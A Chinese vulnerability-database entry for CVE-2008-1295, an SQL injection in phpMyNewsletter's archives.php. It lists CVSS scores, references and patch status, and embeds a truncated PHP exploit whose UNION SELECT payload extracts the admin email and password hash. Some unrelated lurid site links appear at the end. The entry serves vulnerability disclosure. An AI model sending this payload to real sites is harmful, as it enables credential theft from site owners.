| CVE-2008-1295 |
|
发布时间 :2008-03-12 13:44:00 | ||
| 修订时间 :2008-09-05 17:37:22 | ||||
| NMCOE |
[原文]SQL injection vulnerability in archives.php in Gregory Kokanosky (aka Greg’s Place) phpMyNewsletter 0.8 beta 5 and earlier allows remote attackers to execute arbitrary SQL commands via the msg_id parameter.
[CNNVD]Gregory Kokanosky phpMyNewsletter ‘archives.php’SQL注入漏洞(CNNVD-200803-187)
Gregory Kokanosky (aka Greg's Place) phpMyNewsletter中的archives.php存在的SQL注入漏洞。远程攻击者通过msg_id参数执行任意SQL命令。
–
CVSS (基础分值)
| CVSS分值: | 6.8 | [中等(MEDIUM)] |
| 机密性影响: | PARTIAL | [很可能造成信息泄露] |
| 完整性影响: | PARTIAL | [可能会导致系统文件被修改] |
| 可用性影响: | PARTIAL | [可能会导致性能下降或中断资源访问] |
| 攻击复杂度: | MEDIUM | [漏洞利用存在一定的访问条件] |
| 攻击向量: | NETWORK | [攻击者不需要获取内网访问权或本地访问权] |
| 身份认证: | NONE | [漏洞利用无需身份认证] |
–
CWE (弱点类目)
| CWE-89 | [SQL命令中使用的特殊元素转义处理不恰当(SQL注入)] |
–
CPE (受影响的平台与产品)
| 产品及版本信息(CPE)暂不可用 |
–
OVAL (用于检测的技术细节)
| 未找到相关OVAL定义 |
–
官方数据库链接
–
其它链接及资源
|
http://www.securityfocus.com/bid/28189 (UNKNOWN) BID 28189 |
|
http://www.milw0rm.com/exploits/5231 (UNKNOWN) MILW0RM 5231 |
|
http://xforce.iss.net/xforce/xfdb/41197 (UNKNOWN) XF phpmynewsletter-archives-sql-injection(41197) |
–
漏洞信息
| Gregory Kokanosky phpMyNewsletter ‘archives.php’SQL注入漏洞 | |
| 中危 | SQL注入 |
| 2008-03-12 00:00:00 | 2008-09-05 00:00:00 |
| 远程 | |
| Gregory Kokanosky (aka Greg's Place) phpMyNewsletter中的archives.php存在的SQL注入漏洞。远程攻击者通过msg_id参数执行任意SQL命令。 | |
–
公告与补丁
|
目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://gregory.kokanosky.free.fr/v4/phpmynewsletter/ |
–
漏洞信息 (5231)
| phpMyNewsletter <= 0.8b5 (archives.php msg_id) SQL Injection Exploit (EDBID:5231) | |
| php | webapps |
| 2008-03-10 | Verified |
| 0 | Charles Fol |
N/A |
[点击下载] |
#!/usr/bin/php * Date: 03-10-08 * Conditions: magic_quotes_gpc=Off * * This exploit gets admin_pass and admin_email from pmnl_config. */ print "\n"; print " PHPMyNewsletter <= 0.8b5 SQL Injection\n"; print " by real\n\n"; if($argc<2) die("usage: php phpmynewsletter_sql.php \n"); $url = $argv[1]; $c = get($url."archives.php?msg_id='%20UNION%20SELECT%201,1,admin_email,admin_pass%20%20FROM%20pmnl_config%2f%2a&list_id=1"); if(preg_match("# (.+) - 0000-00-00 00:00:00#i",$c,$a) && preg_match("#\t([a-f0-9]{32})
–
漏洞信息
43404 |
|
| phpMyNewsletter archives.php msg_id Parameter SQL Injection | |
Remote / Network Access |
Information Disclosure, Input Manipulation |
| Loss of Confidentiality, Loss of Integrity |
Solution Unknown |
| Exploit Public | Uncoordinated Disclosure |
–
漏洞描述
–
时间线
2008-03-10 |
Unknow |
| 2008-03-10 | Unknow |








![[八卦] 王婷婷—揭秘一个大三女生的性爱录像-微慑信息网-VulSee.com](http://free.86hy.com/crack/pic/1.jpg)
![[随笔]今天国际警察节-微慑信息网-VulSee.com](http://photo.sohu.com/20041017/Img222528326.jpg)

青云网
